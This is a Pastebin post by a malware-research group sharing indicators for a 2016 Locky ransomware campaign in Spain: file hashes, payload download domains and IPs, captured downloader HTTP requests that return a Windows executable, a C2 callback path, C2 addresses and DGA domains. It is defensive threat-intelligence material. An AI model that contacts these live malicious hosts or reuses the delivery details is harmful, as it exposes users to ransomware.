Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #MalwareMustDie!!!
- // Campaign malvertisement screenshot:
- http://imgur.com/a/kXvah
- // Virus Total Info:
- 1. VT https://www.virustotal.com/en/file/5d6d2e0323c8a6efcb3a0fad39b5b17536c62e4cf2877a9e16150a9eb46baecb/analysis/
- 2. VT https://www.virustotal.com/en/file/51d7bba70a9ae3635c5b9bd17b2d8cb8df90ba57c8c84769d1a8296395c74dc0/analysis/
- 3. VT https://www.virustotal.com/en/file/1909ac8a0f17789632250a2b605b0f9140d8756d02003a50f8a5c24d8b3e2315/analysis/
- 4. VT https://www.virustotal.com/en/file/a9be0d13d4632a17d6d4a6b3ab2acce0be969e1b2cdd6a64952290b5c30fb97f/analysis/
- 5. VT https://www.virustotal.com/en/file/f8fc4b8a5f0e84fcf0fe24609a419968fb2e3bdb005a1c669c4e1eecd6bbb0d7/analysis/
- // Payload info
- This is Spain campaign of locky.
- The downloaders are fetching locky from;
- rproducciones.com has address 217.76.130.137
- vonenidan.de has address 212.227.33.186
- il.seroca.com has address 46.226.47.21
- www.centroinfantilelmolino.com has address 217.76.156.98
- // The IP are mostly located GERMANY not Italy, only one in Spain.
- 217.76.130.137 | llge328.servidoresdns.net. |8560 | 217.76.128.0/19 | ONEANDONE | DE | arsys.es | Arsys Internet S.L.
- 212.227.33.186 | hosting.web.de. |8560 | 212.227.0.0/16 | ONEANDONE | DE | 1and1.co.uk | 1&1 Internet AG
- 46.226.47.21 | pl03.azamedia.net. & vz03.azamedia.net. |15699 | 46.226.40.0/21 | AS_ADAM | ES | azalorea.com | Azalorea S.L.
- 217.76.156.98 | slgc573.piensasolutions.com. |8560 | 217.76.128.0/19 | ONEANDONE | DE | arsys.es | Arsys Internet S.L.
- // PoC for verdict is as per follow:
- 1. VT https://www.virustotal.com/en/file/5d6d2e0323c8a6efcb3a0fad39b5b17536c62e4cf2877a9e16150a9eb46baecb/analysis/
- DOMAIN: rproducciones.com
- GET /987t5t7g HTTP/1.1
- Accept: */*
- Accept-Encoding: gzip, deflate
- User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
- Host: rproducciones.com
- Connection: Keep-Alive
- 2. VT https://www.virustotal.com/en/file/51d7bba70a9ae3635c5b9bd17b2d8cb8df90ba57c8c84769d1a8296395c74dc0/analysis/
- DOMAIN: vonenidan.de
- GET /987t5t7g HTTP/1.1
- Accept: */*
- Accept-Encoding: gzip, deflate
- User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
- Host: vonenidan.de
- Connection: Keep-Alive
- HTTP/1.1 200 OK
- Date: Wed, 18 May 2016 07:21:54 GMT
- Server: Apache
- Last-Modified: Mon, 16 May 2016 19:09:58 GMT
- ETag: "a00008e2-58e00-532fa5ee0f256"
- Accept-Ranges: bytes
- Content-Length: 364032
- Keep-Alive: timeout=2, max=200
- Connection: Keep-Alive
- Content-Type: application/x-dosexec
- MZ.......
- 3. VT https://www.virustotal.com/en/file/1909ac8a0f17789632250a2b605b0f9140d8756d02003a50f8a5c24d8b3e2315/analysis/
- HOSTNAME: il.seroca.com
- GET /987t5t7g HTTP/1.1
- Accept: */*
- Accept-Encoding: gzip, deflate
- User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
- Host: il.seroca.com
- Connection: Keep-Alive
- 4. VT https://www.virustotal.com/en/file/a9be0d13d4632a17d6d4a6b3ab2acce0be969e1b2cdd6a64952290b5c30fb97f/analysis/
- DOMAIN: centroinfantilelmolino.com
- GET /987t5t7g HTTP/1.1
- Accept: */*
- Accept-Encoding: gzip, deflate
- User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
- Host: www.centroinfantilelmolino.com
- Connection: Keep-Alive
- 5. VT https://www.virustotal.com/en/file/f8fc4b8a5f0e84fcf0fe24609a419968fb2e3bdb005a1c669c4e1eecd6bbb0d7/analysis/
- DOMAIN: vonenidan.de
- GET /987t5t7g HTTP/1.1
- Accept: */*
- Accept-Encoding: gzip, deflate
- User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
- Host: vonenidan.de
- Connection: Keep-Alive
- HTTP/1.1 200 OK
- Date: Wed, 18 May 2016 07:11:25 GMT
- Server: Apache
- Last-Modified: Mon, 16 May 2016 19:09:58 GMT
- ETag: "a00008e2-58e00-532fa5ee0f256"
- Accept-Ranges: bytes
- Content-Length: 364032
- Keep-Alive: timeout=2, max=200
- Connection: Keep-Alive
- Content-Type: application/x-dosexec
- MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
- // CNC callback
- Method: POST HTTP/1.1
- Path: /userinfo.php
- // IP Infoβ
- 149.202.109.202
- 188.127.231.124
- 176.53.21.105
- 217.12.199.151
- // IP origin:
- 149.202.109.202 | |16276 | 149.202.0.0/16 | OVH | FR | ovh.com | OVH SAS
- 188.127.231.124 | |56694 | 188.127.231.0/24 | DHUB | RU | oversun.ru | Oversun Ltd
- 176.53.21.105 | . |197328 | 176.53.21.0/24 | INETLTD | TR | turkrdns.com | Radore Veri Merkezi Hizmetleri A.S.
- 217.12.199.151 | annakoval.itldc-customer.net. |15626 | 217.12.192.0/19 | ITLAS | UA | itl.net.ua | ITL Company
- // DGA callback:
- puufmpwtv.click
- cduyeehncj.info
- otmbbmbhptwmauf.work
- wrbqohnk.xyz
- srrsqaghjnbucwbyh.work
- xgmypakuhgagcdug.pl
- rexagurueqqiyic.biz
- txqrjdtpeqedo.pw
- ohwoaylllw.info
- bkpmfqwmj.pl
- lggynvfq.su
- :
- :
- ---
- MalwareMustDie, NPO - the team.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement